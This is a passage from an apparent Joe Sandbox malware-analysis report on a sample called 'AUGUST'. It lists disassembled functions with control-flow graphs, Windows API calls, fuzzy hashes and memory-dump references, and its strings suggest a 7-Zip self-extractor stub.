                                          control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 852 4033f8-4033fa 838->852 853 403419-40341b 839->853 854 40340a-403417 call 407776 839->854 840->831 848 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->848 849 40347f-40348a 841->849 844->837 845 4033b6 844->845 845->835 865 4034bc-4034c0 848->865 849->848 850 40348c-403490 849->850 850->848 856 403492-403497 850->856 860 40349c-4034a5 ??3@YAXPAX@Z 852->860 857 40346b-403475 ??3@YAXPAX@Z 853->857 858 40341d-40343c memcpy 853->858 854->852 856->848 862 403499-40349b 856->862 857->865 863 403451-403455 858->863 864 40343e 858->864 860->865 862->860 867 403440-403448 863->867 868 403457-403464 call 401986 863->868 866 403450 864->866 866->863 867->868 869 40344a-40344e 867->869 868->854 872 403466-403469 868->872 869->866 869->868 872->857 872->858
                                          APIs
                                          • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                          • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                          • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                            • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                            • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                          • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 846840743-0
                                          • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                          • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                          • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                          • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD
                                          Function 00404405 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                            • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                            • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                            • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                            • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                            • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                            • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                            • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                            • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                            • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                          • wsprintfW.USER32 ref: 004044A7
                                            • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                          • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                          • String ID: 7zSfxFolder%02d$IA
                                          • API String ID: 3387708999-1317665167
                                          • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                          • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                          • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                          • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58
                                          Function 00408EA4 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 464COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 924 408f26 923->924 925 408f19-408f24 923->925 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 924->927 925->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 945 409199-4091b0 935->945 946 409019-40901c 935->946 939 409020-409035 call 40e8da call 40874d 936->939 966 408fb0-408fb2 937->966 967 408fb6-408fbb 937->967 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 945->952 953 40934c-409367 call 4087ea 945->953 946->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 968 4090ad-4090b3 955->968 969 40907f 955->969 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 964 409051-409061 call 408726 958->964 959->964 988 409063-409066 964->988 989 409068 964->989 966->967 970 408fc3-408fcf 967->970 971 408fbd-408fbf 967->971 981 409187-409196 call 408e83 968->981 982 4090b9-4090d9 call 40d94b 968->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 969->977 970->922 970->923 971->970 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->968 1016 409261-409264 978->1016 1017 4092c9 978->1017 986 4091f7-409209 979->986 987 4092b9-4092bb 979->987 981->945 993 4090de-4090e6 982->993 1002 4093a4-4093b8 call 408761 983->1002 1003 4093ba-4093d6 983->1003 1014 409293-409295 986->1014 1015 40920f-409211 986->1015 1004 4092bf-4092c4 987->1004 996 40906a 988->996 989->996 1000 409283-409288 993->1000 1001 4090ec-4090f3 993->1001 996->955 1012 409290 1000->1012 1013 40928a-40928c 1000->1013 1008 409121-409124 1001->1008 1009 4090f5-4090f9 1001->1009 1002->1003 1080 4093d7 call 40ce70 1003->1080 1081 4093d7 call 40f160 1003->1081 1004->977 1022 4092b2-4092b7 1008->1022 1023 40912a-409138 call 408726 1008->1023 1009->1008 1018 4090fb-4090fe 1009->1018 1012->1014 1013->1012 1025 409297-409299 1014->1025 1026 40929d-4092a0 1014->1026 1015->978 1024 409213-409215 1015->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->987 1022->1004 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1050 409281 1027->1050 1028->1046 1051 409114-40911f call 40d6cb 1028->1051 1029->1004 1034 4092ac-4092ae 1029->1034 1037 4092d4-4092e0 call 408a55 1030->1037 1038 40931d-409346 call 40e959 * 2 1030->1038 1034->1022 1057 4092e2-4092ec 1037->1057 1058 4092ee-4092fa call 408aa0 1037->1058 1038->953 1038->957 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1050->1030 1051->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1066 409165-409167 1060->1066 1067 40916b-409170 1060->1067 1063->1037 1063->1038 1066->1067 1071 409172-409174 1067->1071 1072 409178-409181 1067->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                          • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@
                                          • String ID: IA$IA
                                          • API String ID: 1033339047-1400641299
                                          • Opcode ID: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                                          • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                          • Opcode Fuzzy Hash: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                                          • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44
                                          Function 00410CD0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 23COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID: $KA$4KA$HKA$\KA
                                          • API String ID: 1294909896-3316857779
                                          • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                          • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                          • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                          • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C
                                          Function 004096C7 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 388COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1121 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1121 1122 40983c-409846 call 409425 1112->1122 1113->1114 1115 409780-409796 call 4094e0 call 40969d call 40e959 1114->1115 1116 4097a3-4097a8 1114->1116 1137 40979b-4097a1 1115->1137 1119 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1116->1119 1120 4097aa-4097b4 1116->1120 1125 4097f3-409809 1119->1125 1120->1119 1120->1125 1133 409881-40989a call 4010e2 call 40eb24 1121->1133 1134 409878-40987f call 40ebf7 1121->1134 1144 40984a-40984c 1122->1144 1130 40980c-409814 1125->1130 1136 409816-409825 call 409403 1130->1136 1130->1137 1154 40989d-4098c0 call 40eb19 1133->1154 1134->1133 1136->1130 1137->1109 1144->1110 1157 4098c2-4098c7 1154->1157 1158 4098f6-4098f9 1154->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1164 409954 1159->1164 1165 40994b-409952 call 409c13 1159->1165 1166 409902-409904 1160->1166 1167 409908-40991e call 409530 call 409425 1160->1167 1161->1162 1180 4098e9-4098eb 1162->1180 1181 4098ef-4098f1 1162->1181 1170 409956-40996d call 4010e2 1164->1170 1165->1170 1166->1167 1167->1159 1182 40997b-4099a0 call 409fb4 1170->1182 1183 40996f-409978 1170->1183 1180->1181 1181->1110 1186 4099a2-4099a7 1182->1186 1187 4099e3-4099e6 1182->1187 1183->1182 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1154 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1226 409aa2-409aa4 1213->1226 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1223 409a73-409a75 1218->1223 1224 409a79-409a91 call 409530 call 409425 1218->1224 1219->1213 1220->1195 1221 409adf-409ae5 1220->1221 1221->1195 1223->1224 1224->1144 1233 409a97-409a9d 1224->1233 1229 409aa6-409aa8 1226->1229 1230 409aac-409ab0 1226->1230 1229->1230 1230->1195 1233->1144
                                          APIs
                                          • _EH_prolog.MSVCRT ref: 004096D0
                                          • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                          • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                            • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@$H_prolog
                                          • String ID: HIA
                                          • API String ID: 3431946709-2712174624
                                          • Opcode ID: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                          • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                          • Opcode Fuzzy Hash: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                          • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54
                                          Function 00402844 Relevance: 6.4, APIs: 5, Instructions: 118stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                          APIs
                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                          • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                          • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                          • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcmp$memmove
                                          • String ID:
                                          • API String ID: 3251180759-0
                                          • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                          • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                          • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                          • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55
                                          Function 0040150B Relevance: 6.1, APIs: 4, Instructions: 100synchronizationthreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                          • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                            • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                            • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                            • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                            • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                            • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                            • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                            • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                          • String ID:
                                          • API String ID: 359084233-0
                                          • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                          • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                          • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                          • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E
                                          Function 00401986 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                          • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                          • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ErrorLast$AttributesCreateDirectoryFile
                                          • String ID:
                                          • API String ID: 635176117-0
                                          • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
